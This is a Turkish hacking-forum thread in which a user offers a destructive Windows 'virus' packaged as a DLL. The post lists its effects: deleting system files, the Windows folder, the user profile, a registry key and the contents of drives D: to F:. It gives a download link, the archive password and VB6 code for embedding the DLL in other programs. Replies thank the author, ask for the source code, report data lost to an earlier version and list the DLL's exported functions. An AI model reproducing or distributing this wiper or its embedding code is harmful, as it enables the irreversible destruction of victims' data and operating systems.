Tahribat.com Forumları
Download / Dosya Paylaşım
Çok Tehlikeli Bir Tool DLL Versiyonu (Coded By Cukurova)
Download / Dosya Paylaşım
Çok Tehlikeli Bir Tool DLL Versiyonu (Coded By Cukurova)
Çok Tehlikeli Bir Tool DLL Versiyonu (Coded By Cukurova)
-
MSN de, program(virus) üzerinde değişiklik istekleri üzerine programın DLL versiyonunu yaptım.Alın kendi yaptınız programlarda istediğiniz gibi kullanın... (VB, Delphi, C++ farketmez.)
Bir önceki ile yaptıkları aynı,
- Önemli sistem dosyalarını siler (hal.dll, ntfs.dll......)
- HDD siler (D:,E:,F:)
- Belgerim klasörünü boşaltır.
- Registerdeki HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft girdisini siler.
- Profili siler , C:\Documents and Settings\admin-user
- Sistem klasörlerini siler, C:\windows
Boyutu : 9.50 Kb.
http://www.hemenpaylas.com/download/1351444/cukurova.rar.html
Şifre : tahribat.com
-------------------------------
VB6 için Kullanım ;
'öncelikle DLL referans vermeyi unutmayın;
'Project -> References --> Browse -> cukurova.dll
Dim XXX As New cukurova.virus
XXX.basla
----------------------------------
Bu arada test etmedim,Eğer antivirus programı varsa işlemi bitirmesi uzun sürüyor.Bunun nedeni programdan değil, antivirusun silinen her dosyayı önce virus taramasından geçirmesinden kaynaklamıyor.Sadece sistem dosyası sayısı 14.000 den fazla olduğu için işlemi bitirme süresi 240 sn (4 dk.) kadar uzayabiliyor.Ama çalıştıktan 0.2 sn sonra zaten XP halletmiş oluyor.Yani çalışmayı yarıda kesseniz bile XP artık çalışmayacaktır.
-
sağolun hocam, bende kendi programımda bu exeyi kullanacaktım ama dll yi yazmışsınız :)
Başarılarınızın devamını dilerim -
Source istesek cok mu yersiz olur ?
-
evt musket bende istiyorum :) versin hocamız da birşeyler kapalım
ama program vb de yapılmıştı
hocamın diğer programı Cpp de :) -
Çaktırma ertan... Editledim mesajımı da : )
-
önceki versiyonu süperdi çalıştırdıktan sonra geçen süre sadece yeniden başlatana dek ama sitem yok olmuş d: deki bilgilein tümü (D= 19gb) ama 160 gb'tıntamanına boşaltamamış sadece c,d olmuş olan demekki biraz daha beklese hepsi buuuummmmm
bunuda deneyelim
her ikisi içn ayrı ayrı tşk abilerimize
-
procedure mi function mu kullandın ayrıca function nun adını belirtirsen sevinirim. (şimdi importları exportlarını öğrenmek için program indirmiyeyim :) )
-
Hizmette sınır yoq. ;)
Toplanın millet, cukurova üzerinde baskı kuralım. Bakarsınız paylaşımcılık (kod) damarını ortaya çıkarırız. :Pp -
Ulaşabileceğiniz public olan tek procedure var, oda "basla" komutu ile tetiklenir. Diğer iç procedure ve functionlar private olduğu için ulaşabilme şansınız yok malesef.
Ayrıca restart özelliği ve herhangi bir hatada uyarı ve sistemin durma özelliği yok. -
function QueryInterface(riid: ^GUID; out ppvObj: ^^VOID); stdcall;
function AddRef: UI4; stdcall;
function Release: UI4; stdcall;
function GetTypeInfoCount(out pctinfo: ^UINT); stdcall;
function GetTypeInfo(itinfo: UINT; lcid: UI4; out pptinfo: ^^VOID); stdcall;
function GetIDsOfNames(riid: ^GUID; rgszNames: ^^I1; cNames: UINT; lcid: UI4; out rgdispid: ^I4); stdcall;
function Invoke(dispidMember: I4; riid: ^GUID; lcid: UI4; wFlags: UI2; pdispparams: ^DISPPARAMS; out pvarResult: ^Variant; out pexcepinfo: ^EXCEPINFO; out puArgErr: ^UINT); stdcall;
function basla; stdcall;
Teşekkürler çukurova :) -
İyi de kardeş bu ne? veya şöyle söyliyeyim bu ne işine yaradı?
Hangi fonksiyonun ve prosodurun nasıl çalıştığını burdan nasıl anlıyorsun.
Gereksiz işler bence...
Toplam Hit: 2883 Toplam Mesaj: 14